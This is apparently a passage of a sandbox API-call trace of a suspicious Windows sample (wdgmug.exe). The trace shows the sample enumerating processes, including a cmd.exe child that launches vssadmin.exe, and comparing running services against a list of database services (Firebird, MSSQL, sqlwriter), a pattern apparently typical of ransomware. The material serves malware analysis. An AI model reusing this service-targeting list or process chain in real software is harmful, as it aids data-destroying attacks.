lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x584, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0319.166] lstrlenW (lpString="svchost.exe") returned 11 [0319.166] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0319.166] lstrlenW (lpString="svchost.exe") returned 11 [0319.166] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0319.167] lstrlenW (lpString="svchost.exe") returned 11 [0319.167] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0319.168] lstrlenW (lpString="spoolsv.exe") returned 11 [0319.168] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0319.168] lstrlenW (lpString="svchost.exe") returned 11 [0319.168] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x52c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0319.170] lstrlenW (lpString="audiodg.exe") returned 11 [0319.170] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0319.170] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0319.170] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0319.171] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0319.171] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0319.172] lstrlenW (lpString="Memory Compression") returned 18 [0319.172] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0319.172] lstrlenW (lpString="sihost.exe") returned 10 [0319.172] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0319.173] lstrlenW (lpString="svchost.exe") returned 11 [0319.173] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x938, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0319.174] lstrlenW (lpString="taskhostw.exe") returned 13 [0319.174] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x37, th32ParentProcessID=0xa10, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0319.174] lstrlenW (lpString="explorer.exe") returned 12 [0319.174] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0319.175] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0319.175] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0319.175] lstrlenW (lpString="SearchUI.exe") returned 12 [0319.176] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x744, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0319.176] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0319.176] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0319.177] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0319.177] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0xa24, pcPriClassBase=8, dwFlags=0x0, szExeFile="wdgmug.exe")) returned 1 [0319.178] lstrlenW (lpString="wdgmug.exe") returned 10 [0319.178] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xdd0, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0319.178] lstrlenW (lpString="cmd.exe") returned 7 [0319.178] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0319.179] lstrlenW (lpString="conhost.exe") returned 11 [0319.179] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0319.180] lstrlenW (lpString="vssadmin.exe") returned 12 [0319.180] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xebc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x3e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="consent.exe")) returned 1 [0319.180] lstrlenW (lpString="consent.exe") returned 11 [0319.181] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xebc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x3e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="consent.exe")) returned 0 [0319.181] CloseHandle (hObject=0x540) returned 1 [0319.181] Sleep (dwMilliseconds=0x1f4) [0319.961] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x401a008 [0319.962] EnumServicesStatusExW (in: hSCManager=0x401a008, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0) returned 0 [0319.963] GetLastError () returned 0xea [0319.963] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1cb6) returned 0x41549e0 [0319.964] EnumServicesStatusExW (in: hSCManager=0x401a008, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x41549e0, cbBufSize=0x1cb6, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x41549e0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0) returned 1 [0319.965] CloseServiceHandle (hSCObject=0x401a008) returned 1 [0319.966] lstrlenW (lpString="Appinfo") returned 7 [0319.966] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0319.966] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0319.966] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0319.966] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0319.966] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0319.966] lstrlenW (lpString="AppXSvc") returned 7 [0319.966] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0319.966] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0319.966] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0319.966] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0319.966] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0319.966] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0319.966] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0319.966] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0319.966] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0319.966] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0319.966] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0319.966] lstrlenW (lpString="Audiosrv") returned 8 [0319.966] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0319.966] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0319.966] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0319.966] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0319.966] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0319.966] lstrlenW (lpString="BFE") returned 3 [0319.966] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0319.966] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0319.966] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0319.966] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0319.967] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0319.967] lstrlenW (lpString="BITS") returned 4 [0319.967] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BITS") returned 1 [0319.967] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BITS") returned 1 [0319.967] lstrcmpiW (lpString1="sqlwriter", lpString2="BITS") returned 1 [0319.967] lstrcmpiW (lpString1="mssqlserver", lpString2="BITS") returned 1 [0319.967] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BITS") returned 1 [0319.967] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0319.967] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0319.967] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0319.967] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0319.967] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0319.967] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0319.967] lstrlenW (lpString="CDPSvc") returned 6 [0319.967] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0319.967] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0319.967] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0319.967] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0319.967] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0319.967] lstrlenW (lpString="ClickToRunSvc") returned 13 [0319.967] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0319.967] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0319.967] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0319.967] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0319.967] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0319.967] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0319.967] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0319.967] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0319.968] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0319.968] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0319.968] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0319.968] lstrlenW (lpString="CryptSvc") returned 8 [0319.968] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0319.968] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0319.968] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0319.968] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0319.968] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0319.968] lstrlenW (lpString="DcomLaunch") returned 10 [0319.968] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0319.968] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0319.968] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0319.968] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0319.968] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0319.968] lstrlenW (lpString="DeviceAssociationService") returned 24 [0319.968] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0319.968] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0319.968] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0319.968] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0319.968] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0319.968] lstrlenW (lpString="Dhcp") returned 4 [0319.968] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0319.968] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0319.968] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0319.968] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0319.968] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0319.968] lstrlenW (lpString="Dnscache") returned 8 [0319.968] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0319.969] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0319.969] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0319.969] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0319.969] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0319.969] lstrlenW (lpString="DPS") returned 3 [0319.969] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0319.969] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0319.969] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0319.969] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0319.969] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0319.969] lstrlenW (lpString="DusmSvc") returned 7 [0319.969] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0319.969] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0319.969] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0319.969] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0319.969] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0319.969] lstrlenW (lpString="EventLog") returned 8 [0319.969] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0319.969] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0319.969] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0319.969] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0319.969] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0319.969] lstrlenW (lpString="EventSystem") returned 11 [0319.969] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0319.969] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0319.969] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0319.969] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0319.969] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0319.969] lstrlenW (lpString="FontCache") returned 9 [0319.970] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0319.970] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0319.970] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0319.970] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0319.970] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0319.970] lstrlenW (lpString="gpsvc") returned 5 [0319.970] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0319.970] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0319.970] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0319.970] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0319.970] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0319.970] lstrlenW (lpString="iphlpsvc") returned 8 [0319.970] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0319.970] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0319.970] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0319.970] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0319.970] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0319.970] lstrlenW (lpString="KeyIso") returned 6 [0319.970] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0319.970] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0319.970] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0319.970] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0319.970] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0319.970] lstrlenW (lpString="LanmanServer") returned 12 [0319.970] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0319.970] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0319.970] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0319.970] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0319.970] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0319.970] lstrlenW (lpString="LanmanWorkstation") returned 17 [0319.970] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0319.971] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0319.971] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0319.971] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0319.971] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0319.971] lstrlenW (lpString="lfsvc") returned 5 [0319.971] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0319.971] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0319.971] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0319.971] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0319.971] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0319.971] lstrlenW (lpString="lmhosts") returned 7 [0319.971] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0319.971] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0319.971] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0319.971] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0319.971] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0319.971] lstrlenW (lpString="LSM") returned 3 [0319.971] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0319.971] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0319.971] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0319.971] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0319.971] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0319.971] lstrlenW (lpString="MpsSvc") returned 6 [0319.971] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0319.971] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0319.971] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0319.971] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0319.971] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0319.971] lstrlenW (lpString="NcbService") returned 10 [0319.971] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0319.971] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0319.971] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0319.972] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0319.972] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0319.972] lstrlenW (lpString="netprofm") returned 8 [0319.972] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0320.248] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0320.248] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0320.249] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0320.249] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0320.249] lstrlenW (lpString="NgcSvc") returned 6 [0320.249] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0320.249] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0320.249] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0320.249] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0320.249] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0320.249] lstrlenW (lpString="NlaSvc") returned 6 [0320.249] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0320.249] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0320.249] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0320.249] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0320.249] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0320.249] lstrlenW (lpString="nsi") returned 3 [0320.269] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0320.269] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0320.269] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0320.269] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0320.269] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0320.269] lstrlenW (lpString="PcaSvc") returned 6 [0320.269] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0320.269] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0320.269] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0320.269] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0320.269] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0320.269] lstrlenW (lpString="PlugPlay") returned 8 [0320.269] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0320.269] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0320.269] 